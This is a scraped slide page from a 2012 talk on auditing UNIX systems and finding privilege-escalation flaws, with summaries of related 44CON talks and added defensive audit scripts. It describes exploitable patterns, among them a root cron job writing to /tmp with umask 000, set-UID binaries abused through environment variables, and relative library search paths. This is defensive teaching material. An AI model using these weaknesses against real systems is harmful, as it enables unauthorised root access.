This document provides an overview of authentication and authorization in Ruby on Rails applications. It discusses how Rails handles authentication and authorization out of the box, as well as common gems used to add these capabilities like Devise and CanCan. It also covers topics like session management, password resets, and potential security issues to consider like the password reset type confusion vulnerability.
44CON London 2015 - Software Defined Networking (SDN) Security44CON
This document provides an overview of software-defined networking (SDN) security. It begins with an introduction to SDN and explains how decoupling the control plane from the data plane creates new attack surfaces. It then discusses recent SDN vulnerabilities in controllers like OpenDaylight and ONOS. Defensive technologies like Topoguard and security-mode ONOS are presented. The document concludes with recommendations for secure SDN development practices and a vision for improving the security of OpenDaylight.
44CON London 2015 - DDoS mitigation EPIC FAIL collection44CON
This document discusses strategies for conducting distributed denial-of-service (DDoS) attacks and bypassing common DDoS mitigation tactics. It begins with an introduction to DDoS and then outlines four pillars of amplification attacks: amplification factors, network usage, CPU usage, memory usage, and storage usage. The document then discusses 10 common DDoS mitigation practices and provides recommendations for how to bypass each one through various amplification techniques, protocol abuse, and other attack methods. It concludes by noting that effective DDoS mitigation requires a holistic approach and cannot be solved through any single technology.
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON
This document discusses asynchronous vulnerabilities and callback-oriented hacking techniques. It describes how asynchronous issues are often invisible and outlines solutions using callbacks, such as through DNS requests. It provides examples of payload techniques for issues like SQL injection, command injection, and XSS that call out to an external domain to confirm exploitation. Finally, it notes hazards like friendly fire and ways adversaries may detect the callbacks.
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...44CON
A stack-based buffer overflow vulnerability was discovered in FreeType's CFF rasterizer during fuzz testing. The vulnerability occurs when building the hintmap data structure in the cf2_hintmap_build function. By analyzing the source code, it appears the vulnerability is caused by insufficient bounds checking when accessing the hint mask array via the maskPtr pointer, allowing writes beyond the end of the allocated buffer. This highlights the ongoing need to fuzz test font parsing libraries given the complexity of font formats and opportunity for security issues.
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
The document discusses 5 ways to exploit JTAG (Joint Test Action Group) interfaces to gain unauthorized access or privileges on a system. The 5 techniques are: 1) Accessing non-volatile storage like flash memory via boundary scan, 2) Scraping memory for offline forensic analysis, 3) Patching boot arguments to change how the system boots, 4) Directly patching the kernel by modifying code or function pointers in memory, and 5) Patching a specific process by searching memory for its code and modifying it. While some techniques like memory scraping are slow, others like boot argument patching or kernel patching can be done quickly and provide privileged access. JTAG interfaces provide I/O, execution control, and memory access that enable
2. # whoami_
# Tim Brown
# @timb_machine
# Head Of Research at Portcullis Computer Security Ltd
# http://www.nthdimension.org.uk/
44con, London, 2012 Tim Brown 2
Portcullis Computer Security Ltd
3. # last_
# >15 years of UNIX experience
# Background in telcos and finance
# 9 years at Portcullis
# More at http://44con.com/speaker/timbrown/
4. # cat .plan_
# Auditing
# Problems
# Solutions
# Going further
# Why?
# The attack surface
# In the real world
# In the lab
5. # Auditing_
# Problems
# Solutions
6. # Problems_
# Limited access
# Varying OS capabilities
# Multiple solutions
# Differences in requirements
7. # Limited access_
# Client doesn't own the system
# Client doesn't want to give (root) access
# System is physically unavailable
# System is a black box
8. # Varying OS capabilities_
# Standards leave elements undefined
# OS tool chain not sufficient
# * GNU/Linux moves much faster than commercial OS
# Solaris 10 (much) > Solaris 8
9. # Multiple solutions_
# How do you lock an account?
# passwd -l?
# Change the shell?
# Etc...
# If you don't run sendmail, should the configuration still be hardened?
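As an added illustration of why "how do you lock an account?" has more than one answer, the following sh script (written for this page, not part of Tim Brown's slides) classifies constructed passwd/shadow-style records by both locking techniques the slide lists and reports the gap each partial lock leaves. The user names, hash placeholders and note wording are constructed for the demo; the "!" and "*LK*" prefixes are the markers passwd -l writes on Linux and Solaris respectively.

```shell
#!/bin/sh
# Added example, not from the slides: an account-lock audit that checks both
# locking techniques (password-field lock vs. non-login shell), because an
# account locked one way may still be usable the other way. Input is
# constructed passwd/shadow-format text, not data from any real system.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/sh
svc:x:101:101:batch service:/opt/svc:/bin/sh
oldadmin:x:1001:1001:left 2011:/home/oldadmin:/sbin/nologin
bin:x:2:2:bin:/bin:/bin/false
contractor:x:1002:1002:contractor:/home/contractor:/bin/sh'

# Hash fields are placeholders; "!" (Linux passwd -l) and "*LK*" (Solaris
# passwd -l) prefixes are the lock markers the classifier looks for.
SAMPLE_SHADOW='root:$6$placeholder$hash:19000:0:99999:7:::
svc:!$6$placeholder$hash:19000:0:99999:7:::
oldadmin:$6$placeholder$hash:18000:0:99999:7:::
bin:*LK*:18000:0:99999:7:::
contractor:!!:19000:0:99999:7:::'

# field_for USER FILETEXT N: column N of USER's record (passwd/shadow layout).
field_for() {
    printf '%s\n' "$2" | awk -F: -v u="$1" -v n="$3" '$1 == u { print $n; exit }'
}

# lock_state USER: prints active | pw-locked | shell-locked | fully-locked
lock_state() {
    hash=$(field_for "$1" "$SAMPLE_SHADOW" 2)
    shell=$(field_for "$1" "$SAMPLE_PASSWD" 7)
    pw_locked=0; shell_locked=0
    case "$hash" in '!'*|'*'*) pw_locked=1 ;; esac
    case "$shell" in */nologin|*/false|/dev/null) shell_locked=1 ;; esac
    case "$pw_locked$shell_locked" in
        00) echo active ;;
        10) echo pw-locked ;;
        01) echo shell-locked ;;
        11) echo fully-locked ;;
    esac
}

# audit_accounts: one line per account, with the gap each partial lock leaves.
audit_accounts() {
    printf '%s\n' "$SAMPLE_PASSWD" | awk -F: '{ print $1 }' | while read -r user; do
        state=$(lock_state "$user")
        case "$state" in
            pw-locked)    note='password refused, shell still valid: confirm key logins and cron jobs were disabled too' ;;
            shell-locked) note='no login shell, hash still live: check services that authenticate without starting the shell' ;;
            *)            note='' ;;
        esac
        printf '%-12s %-13s %s\n' "$user" "$state" "$note"
    done
}

audit_accounts
```

On a real host, feed the contents of /etc/passwd and /etc/shadow (or the Solaris equivalents) into SAMPLE_PASSWD and SAMPLE_SHADOW; AIX keeps its hashes in /etc/security/passwd in a different stanza format, so that platform needs its own field_for.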
10. # Differences in requirements_
# Which audit methodology do you use?
# Vendors?
# US DoD?
# CIS?
# Etc...
# What if they differ significantly?
# Would you know?
11. # Solutions_
# Better scripts
# Gap analysis
# C(ommon) C(onfiguration) E(numeration)
# Smarter humans
12. # Gap analysis_
# We probably need to know what different methodologies check for
# I wish someone else had done it
13. # C(ommon) C(onfiguration) E(numeration)_
# They have (kinda):
# http://cce.mitre.org/
# Incomplete
# Missing various OS
# Not sure I agree with their methodology
# No mention of gap analysis (AIX guy may not know Solaris and vice versa)
# They consider outcome, not technique
14. # Smarter humans_
# I don't scale well!
# We all need training when it comes to stuff we don't see every day
# Maybe talks like this will help DevOps get their shit together?
15. # Going further_
# Why?
# The attack surface
# In the real world
16. # Why?_
# Bug hunting
# More importantly, auditing fails to answer the hard question – did you want segregation of roles with that?
17. # The attack surface_
OS:              Kernel | Services
Enterprise apps: Services | Batch jobs | User roles
DevOps:          Batch jobs | User roles
Users:           Misfortune | Malice
# If “everything is a file”, we need to get better at analysing the files...
18. # In the real world_
# The OS should protect us from ourselves
# Enterprise applications continue to accumulate features
# DevOps will replace us all with shell scripts
19. # OS flaws_
# Bad standards
# Forks
# Poor defaults
# Incorrectly implemented separation of privileges
# Poorly implemented administrative functionality
# Incomplete antiexploitation mitigations
20. # Examples_
# Shared code such as CDE
# Binaries owned by “bin” user
# Binaries such as telnet and ftp being SetUID
# WPAR isolation
# Patching may be the problem, not the solution
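An added example (not from the slides) that turns the "Examples" slide into an audit check: it classifies set-UID files by owner, by world-writability and by whether they are network clients such as telnet or ftp. The inventory lines below are constructed and name no real host; collect_setuid shows how to gather the real ones with find(1) and ls(1) on a live system.

```shell
#!/bin/sh
# Added example, not from the slides: triage set-UID binaries the way the
# "Examples" slide suggests (owned by "bin", network clients such as telnet or
# ftp, world-writable files). Inventory lines are "mode owner path"; the
# sample below is constructed.

SAMPLE_INVENTORY='-rwsr-xr-x root /usr/bin/passwd
-rwsr-xr-x bin /usr/bin/telnet
-rwsr-xr-x bin /usr/lib/legacy/helper
-rwsr-xrwx root /opt/app/bin/ctl
-rwxr-xr-x root /usr/bin/ls
-rwsr-xr-x root /usr/bin/ftp'

# classify_line MODE OWNER PATH: print "path: finding[, finding]" when the
# file is set-UID and merits attention; print nothing otherwise.
classify_line() {
    mode=$1 owner=$2 path=$3
    case "$mode" in ???[sS]*) ;; *) return 0 ;; esac      # set-UID bit only
    findings=''
    # a non-root owner can replace a root set-UID binary with code of their own
    [ "$owner" != root ] && findings="${findings}owned by '$owner' not root, "
    # anyone can rewrite a world-writable set-UID file
    case "$mode" in ????????w*) findings="${findings}world-writable, " ;; esac
    # network clients are the classic set-UID bug source the slide mentions
    case "${path##*/}" in telnet|ftp|rlogin|rsh|rcp)
        findings="${findings}set-UID network client, " ;; esac
    [ -n "$findings" ] && printf '%s: %s\n' "$path" "${findings%, }"
    return 0
}

# audit_inventory: read "mode owner path" lines from stdin, classify each.
audit_inventory() {
    while read -r mode owner path; do
        [ -n "$mode" ] && classify_line "$mode" "$owner" "$path"
    done
    return 0
}

# audit_sample: run the classifier over the constructed inventory.
audit_sample() {
    printf '%s\n' "$SAMPLE_INVENTORY" | audit_inventory
}

# collect_setuid ROOT: build the same inventory from a live filesystem using
# only find(1) and ls(1), which exist on old Solaris/AIX as well as Linux.
# Field parsing assumes paths without spaces.
collect_setuid() {
    find "$1" -type f -perm -4000 -exec ls -ld {} \; 2>/dev/null |
        awk '{ print $1, $3, $NF }'
}

audit_sample
```

On a real host, pipe `collect_setuid /` into audit_inventory instead of calling audit_sample; the set-GID case is the same check with -perm -2000 and the group column.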
21. # Antiexploit mitigations_
Mitigation                                         * GNU/Linux   AIX
Mandatory access control                           Y             N (Y in Trusted AIX)
Non-executable stack                               Y             N (select mode by default)
ASLR                                               Y             N
Hardened malloc()                                  Y             N (Y with Watson malloc())
Stack cookies and other compile time mitigations   Y (glibc)     N
mmap() NULL                                        N             N
24. # Hardened malloc()_
# Check out David Litchfield's paper “Heap overflows on AIX 5”
# Also, “Enhancements in AIX 5L Version 5.3 for application development” mentions a number of enhancements / possible areas of concern
26. # Enterprise “features”_
# Data
# The real value of your system
# “Interesting” code
# More code is always bad, but OS code at least benefits more from the “many eyes” principle – assuming the “many eyes” are actually looking – your enterprise app may not
27. # “Interesting” code_
# Backdoors
# Proprietary protocols
# Embedded library copies
# Changes to user environment
# Insecure API usage
# Missing antiexploitation techniques
# Key material and entropy
# Java :)
28. # Practising unsafe DevOps_
# Build infrastructure
# Cron, cron, cron
# .rhosts
# Sudo :)
# Init and inetd
# User provisioning and access management
# Key material
# NFS
29. # Cron, cron, cron_
# Your shell script just ran over my shadow
# grep victim /var/spool/cron/crontabs/*
/var/spool/cron/crontabs/root:0 01 * * * /opt/victim/start.sh
# cat /opt/victim/start.sh
...
umask 000
OUTDIR=/tmp
...
service=/opt/victim/service
...
OUTFILE="${OUTDIR}/${DATE}_${TIME}.log"
...
$service -o ${OUTFILE}
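The crontab and script above amount to a root job that writes a predictably named log into /tmp with umask 000, which is exactly the combination an auditor wants to find before someone else does. The Python script below is an added example, not code from the talk or from unixprivesccheck: it lists the commands scheduled in a crontab and scans each script for a permissive umask and for output directories under /tmp or /var/tmp. The crontab and script text embedded in it are constructed to mirror the slide, /opt/victim/start.sh and the other paths are the slide's illustrative names, and the audit is purely textual, so scripts are read but never executed.

```python
"""Audit crontab entries for root jobs that write into shared directories with a permissive umask.

Added example, not part of the talk or of unixprivesccheck. The crontab and script
samples are constructed to mirror the slide; the paths are illustrative.
"""
import re

SAMPLE_CRONTAB = """# constructed sample of /var/spool/cron/crontabs/root
SHELL=/bin/sh
0 01 * * * /opt/victim/start.sh
"""

SAMPLE_SCRIPT = """#!/bin/sh
umask 000
OUTDIR=/tmp
service=/opt/victim/service
OUTFILE="${OUTDIR}/${DATE}_${TIME}.log"
$service -o ${OUTFILE}
"""

SHARED_DIRS = ("/tmp", "/var/tmp")
# Per-user crontab layout: five time fields, then the command (no user column as in /etc/crontab;
# @reboot-style shorthands are not handled).
CRON_ENTRY = re.compile(r"^\s*(?:\S+\s+){5}(\S+)")
UMASK = re.compile(r"^umask\s+([0-7]{1,4})\s*$")
# NAME=/abs/path or NAME="/abs/path"; assignments built from other variables are not resolved.
ASSIGN = re.compile(r"^(\w+)=([\"']?)(/[^\"'\s]*)\2")


def crontab_commands(text):
    """Return the command path of every scheduled entry, skipping comments and VAR=value lines."""
    cmds = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^\w+=", s):
            continue
        m = CRON_ENTRY.match(s)
        if m:
            cmds.append(m.group(1))
    return cmds


def audit_script_text(text):
    """Return (line number, description) for each risky line in a shell script's text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        m = UMASK.match(s)
        if m:
            # Anything that does not clear both group- and other-write creates shared-writable files.
            if (int(m.group(1), 8) & 0o022) != 0o022:
                findings.append((lineno, "umask %s: new files are group- or world-writable" % m.group(1)))
            continue
        m = ASSIGN.match(s)
        if m and any(m.group(3) == d or m.group(3).startswith(d + "/") for d in SHARED_DIRS):
            # A root job writing a predictable name into a world-writable directory is the slide's case.
            findings.append((lineno, "%s=%s: output placed in a shared directory" % (m.group(1), m.group(3))))
    return findings


def audit_crontab(crontab_text, read_script=None):
    """Map each scheduled command to its findings; read_script defaults to reading the file from disk."""
    if read_script is None:
        def read_script(path):
            with open(path) as f:
                return f.read()
    report = {}
    for cmd in crontab_commands(crontab_text):
        try:
            report[cmd] = audit_script_text(read_script(cmd))
        except OSError as exc:
            report[cmd] = [(0, "could not read script: %s" % exc)]
    return report


if __name__ == "__main__":
    # Offline demonstration on the constructed samples.
    for cmd, findings in audit_crontab(SAMPLE_CRONTAB, read_script=lambda p: SAMPLE_SCRIPT).items():
        for lineno, what in findings:
            print("%s:%d: %s" % (cmd, lineno, what))
```

Run against a real system by passing the contents of each file under /var/spool/cron/crontabs to audit_crontab() with the default reader; because the checks are regular expressions over the script text, a script that builds its output path indirectly will not be flagged and still needs a manual read.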
30. # In the lab_
# Systems
# Books
# Code
# Tools
# Techniques
31. # Systems_
# Buy or emulate the systems you see in the wild
# Better still, buy or emulate those you don't – they're still there!
32. # Books_
# If you understand how one OS works, the next OS you look at might just work in a similar way (with similar bugs / different edge cases):
# Vendor web sites
# Man pages
# Solaris Systems Programming and Solaris Internals are great books
33. # Code_
# Next time code leaks, take a look, your adversaries will
# Identify lists like oss-security, fewer size contests mean more signal and less noise
# .jar files are human readable
34. # Tools_
# strings and grep
# truss and strace
# DTrace and SystemTap
# objdump, GDB and IDA
# jad, JDGUI and friends
# Compilers
# checksec.sh (for * GNU/Linux)
# unixprivesccheck
35. # Techniques_
# Sometimes the same crash on another OS yields greater joy – the Solaris stack for a certain RPC service isn't munged
# SetUID binaries can often be exploited via obscure environment variables – ++ local roots for IBM products :)
# Old techniques can be reapplied – glob() style bugs still afflict AIX
36. # Techniques ++_
# Auditing (the other type) will catch stuff you might miss
# Decompile .jar files
# Check what libraries $enterpriseapp ships with (don't forget to check for embedded JVMs)
37. # Techniques ++_
# Check against Microsoft's banned API list
# Check for antiexploitation mitigations
# DT_RPATH AKA Import File Strings
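For the GNU/Linux column of the mitigations table and for the "Check for antiexploitation mitigations" step above, the per-binary part of the check can be done from the ELF program headers alone. The Python script below is an added example; it is not checksec.sh and not code from the talk. It reports whether a 64-bit ELF binary carries a PT_GNU_STACK header without the execute flag (non-executable stack), was linked as ET_DYN (PIE, the prerequisite for the main image to be randomised by ASLR) and has a PT_GNU_RELRO segment. build_test_image() constructs a header-only image so the checks can be exercised without a real binary; stack cookies, which checksec.sh infers from __stack_chk_fail in the symbol table, need the dynamic section and are not covered here.

```python
"""Report build-time mitigations of an ELF64 binary from its program headers.

Added example (not checksec.sh, not code from the talk); standard library only.
"""
import struct

ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4


def parse_elf64(data):
    """Return (e_type, [(p_type, p_flags), ...]) for an ELF64 image held in memory."""
    if data[:4] != b"\x7fELF" or data[4] != 2:           # EI_CLASS: 2 = ELFCLASS64
        raise ValueError("not an ELF64 image")
    endian = "<" if data[5] == 1 else ">"                # EI_DATA: 1 = little-endian
    (e_type, _machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from(endian + "HHIQQQIHHH", data, 16)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from(endian + "II", data, e_phoff + i * e_phentsize)
        phdrs.append((p_type, p_flags))
    return e_type, phdrs


def check_mitigations(data):
    """Answer three of the table's questions for one binary: PIE, NX stack, RELRO."""
    e_type, phdrs = parse_elf64(data)
    flags = dict(phdrs)
    return {
        "pie": e_type == ET_DYN,
        # With no PT_GNU_STACK header the loader falls back to an executable stack,
        # so its absence is reported the same way as an explicit PF_X.
        "nx_stack": PT_GNU_STACK in flags and not flags[PT_GNU_STACK] & PF_X,
        "relro": PT_GNU_RELRO in flags,
    }


def check_file(path):
    with open(path, "rb") as f:
        return check_mitigations(f.read())


def build_test_image(pie=True, nx_stack=True, relro=True, gnu_stack=True):
    """Construct a header-only ELF64 image (not runnable code) to exercise the checks offline."""
    phdrs = []
    if gnu_stack:
        phdrs.append((PT_GNU_STACK, PF_R | PF_W | (0 if nx_stack else PF_X)))
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R))
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)   # ELFCLASS64, little-endian, EV_CURRENT
    header = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        ET_DYN if pie else ET_EXEC, 62, 1, 0,             # e_type, EM_X86_64, e_version, e_entry
        64, 0, 0,                                         # e_phoff (right after the header), e_shoff, e_flags
        64, 56, len(phdrs), 64, 0, 0)                     # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    table = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return header + table


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, check_file(path))
```

The script reads only the ELF header and program header table, so it works on stripped binaries and on files copied off a system that has no readelf or checksec.sh available; a "pie": False result on a SetUID binary is the case worth following up first.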
38. # DT_RPATH AKA Import File Strings_
# dump -Hv kbbacf1
kbbacf1:
***Loader Section***
Loader Header Information
VERSION# #SYMtableENT #RELOCent LENidSTR
0x00000001 0x0000000f 0x0000001c 0x000000b5
#IMPfilID OFFidSTR LENstrTBL OFFstrTBL
0x00000007 0x000002d8 0x00000063 0x0000038d
***Import File Strings***
INDEX PATH BASE MEMBER
0 /usr/lib:/lib::/opt/IBM/ITM/tmaitm6/links/aix51/lib:.:./lib:../lib::
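The slide's point is the INDEX 0 path: besides /usr/lib and /lib it contains empty components, ".", "./lib" and "../lib", so where the loader finds a library depends on the working directory of whoever runs kbbacf1. The Python script below is an added example, not code from the talk: it parses dump -Hv style output, splits that path and flags every component that is not a fixed absolute directory; on a live AIX system audit_libpath(..., check_fs=True) additionally checks that each absolute directory exists, is owned by root and is not writable by group or others. The listing embedded in it is the one from the slide, with one extra constructed import line (index 1) to show that only index 0 is examined.

```python
"""Audit the library search path embedded in an AIX binary, as printed by dump -Hv.

Added example (not from the talk). parse_libpath() extracts the INDEX 0 entry of the
Import File Strings section, classify_component() judges each component syntactically,
and directory_problem() checks an absolute directory on disk.
"""
import os
import re
import stat

# Listing from the slide (binary kbbacf1); the index-1 line is a constructed addition
# to show that only index 0 carries the search path.
SAMPLE_DUMP = """kbbacf1:
***Loader Section***
Loader Header Information
VERSION# #SYMtableENT #RELOCent LENidSTR
0x00000001 0x0000000f 0x0000001c 0x000000b5
#IMPfilID OFFidSTR LENstrTBL OFFstrTBL
0x00000007 0x000002d8 0x00000063 0x0000038d
***Import File Strings***
INDEX PATH BASE MEMBER
0 /usr/lib:/lib::/opt/IBM/ITM/tmaitm6/links/aix51/lib:.:./lib:../lib::
1 /usr/lib libc.a shr.o
"""

IMPORTS_HEADER = "***Import File Strings***"


def parse_libpath(dump_output):
    """Return the INDEX 0 search path of the Import File Strings section, split on ':'."""
    in_imports = False
    for line in dump_output.splitlines():
        if IMPORTS_HEADER in line:
            in_imports = True
            continue
        if in_imports:
            m = re.match(r"\s*0\s+(\S+)\s*$", line)
            if m:
                # str.split keeps the empty strings produced by '::' and a trailing ':',
                # and those empty components are exactly what we need to see.
                return m.group(1).split(":")
    raise ValueError("no INDEX 0 entry in the Import File Strings section")


def classify_component(comp):
    """Describe why a component is unsafe, or return None for a fixed absolute path."""
    if comp == "":
        return "empty component (the '::' on the slide): searched as the current directory"
    if not comp.startswith("/"):
        return "relative path: resolved against the caller's working directory"
    return None


def directory_problem(path):
    """On a live system, report an absolute directory that is missing, not root-owned or writable by others."""
    try:
        st = os.stat(path)
    except OSError:
        return "does not exist"
    if not stat.S_ISDIR(st.st_mode):
        return "not a directory"
    if st.st_uid != 0:
        return "owned by uid %d, not root" % st.st_uid
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "writable by group or others"
    return None


def audit_libpath(components, check_fs=False):
    """Return (index, component, reason) for every component that fails the checks."""
    findings = []
    for idx, comp in enumerate(components):
        reason = classify_component(comp)
        if reason is None and check_fs:
            reason = directory_problem(comp)
        if reason is not None:
            findings.append((idx, comp, reason))
    return findings


if __name__ == "__main__":
    import subprocess
    import sys
    # Usage on AIX (hypothetical script name): python libpath_audit.py /path/to/binary
    out = subprocess.run(["dump", "-Hv", sys.argv[1]], capture_output=True, text=True, check=True).stdout
    for idx, comp, reason in audit_libpath(parse_libpath(out), check_fs=True):
        print("%2d %-45r %s" % (idx, comp, reason))
```

Run over every SetUID binary on the box, the findings list is the one to hand to the vendor: each relative or empty component is a place where the binary's behaviour is decided by the caller rather than by the administrator, and the filesystem checks catch the quieter case of an absolute directory that anyone can write to.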
39. # unixprivesccheck_
# Originally conceived by @pentestmonkey
# I'm working on 2.x
# Code will be made real soon now!
40. # Conclusions_
# Ask yourself “who analysed the OS?”; “do I care about segregation of roles?”; “do I know what my applications are doing?”; “do I care what my DevOps teams are bringing to the party?”
# If these questions matter, don't audit, whitebox
41. # Questions_
< /dev/audience